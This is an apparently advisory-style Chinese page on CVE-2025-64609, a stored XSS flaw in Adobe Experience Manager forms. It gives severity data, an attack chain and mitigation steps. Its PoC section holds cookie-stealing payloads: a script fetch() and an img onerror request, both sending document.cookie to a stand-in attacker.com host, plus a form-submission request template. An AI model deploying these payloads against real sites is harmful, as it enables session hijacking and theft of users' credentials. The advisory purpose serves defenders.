CVE-2025-64609 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64609

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64609是Adobe Experience Manager中的一个存储型跨站脚本(XSS)漏洞，CVSS评分5.4，属于中等严重性。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者利用低权限账号即可将恶意JavaScript代码注入到存在漏洞的表单字段中。当其他用户浏览包含该恶意代码的页面时，注入的脚本会在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等安全问题。由于是存储型XSS，恶意脚本会永久保存在服务器端，影响所有访问该页面的用户。Adobe官方已发布安全公告(APSB25-115)确认此漏洞并提供修复方案。

技术细节

该漏洞为存储型XSS(CWE-79)，存在于Adobe Experience Manager的表单处理模块中。攻击流程如下：1)攻击者使用低权限账号登录系统；2)在存在漏洞的表单字段中注入恶意JavaScript代码，如<img src=x onerror=alert(document.cookie)>；3)由于输入验证不足，恶意代码被存储到数据库中；4)当其他用户访问包含该字段的页面时，服务器从数据库读取数据并直接渲染到HTML中；5)受害者浏览器执行注入的恶意脚本。由于AEM内容片段、表单组件或用户配置文件等模块可能未对用户输入进行充分的HTML转义，攻击者可利用此漏洞窃取会话Cookie、伪造页面内容或进行钓鱼攻击。修复方案需在数据输出时进行适当的HTML编码，并对用户输入进行白名单过滤。

攻击链分析

STEP 1

1.侦察阶段

攻击者识别目标Adobe Experience Manager版本，确认其为6.5.23或更早版本，并定位存在漏洞的表单输入点

STEP 2

2.初始访问

攻击者使用低权限账号登录Adobe Experience Manager，或通过注册普通用户账号获取基础访问权限

STEP 3

3.恶意载荷注入

在存在漏洞的表单字段(如评论、用户资料、内容片段等)中注入恶意JavaScript代码，由于输入验证不足，载荷被存储到服务器数据库

STEP 4

4.载荷持久化

恶意脚本随正常内容保存，当其他用户访问相关页面时，服务器从数据库读取并渲染该内容

STEP 5

5.触发执行

受害用户访问包含恶意代码的页面，浏览器解析HTML时执行注入的JavaScript脚本

STEP 6

6.数据窃取/会话劫持

恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-64609 -->
<!-- This PoC demonstrates the vulnerability mechanism -->

<!-- Step 1: Malicious payload injection -->
<!-- In vulnerable form field, submit the following payload: -->
<script>
  // Steal session cookies
  var cookies = document.cookie;
  fetch('https://attacker.com/steal?c=' + btoa(cookies));
</script>

<!-- Alternative payload using event handler: -->
<img src=x onerror="
  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://attacker.com/log?data=' + document.cookie, true);
  xhr.send();
">

<!-- Step 2: When victim views the page, script executes -->
<!-- The injected script runs in victim's browser context -->

<!-- Example form submission request -->
POST /content/forms/af/[form-name]/jcr:content/guideContainer.af.submit.jsp HTTP/1.1
Host: [target]
Cookie: [attacker-session]
Content-Type: application/x-www-form-urlencoded

fieldName=[PAYLOAD]&submit=Submit

<!-- Note: Replace [PAYLOAD] with encoded XSS payload -->

影响范围

Adobe Experience Manager <= 6.5.23

Adobe Experience Manager 6.5.x 所有早于6.5.24的版本

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1)限制低权限用户创建或编辑表单内容；2)在Web层部署XSS过滤规则；3)对所有表单输入启用严格的内容过滤；4)监控AEM访问日志异常请求；5)考虑临时禁用非必要的表单组件；6)实施严格的CORS策略限制跨域请求。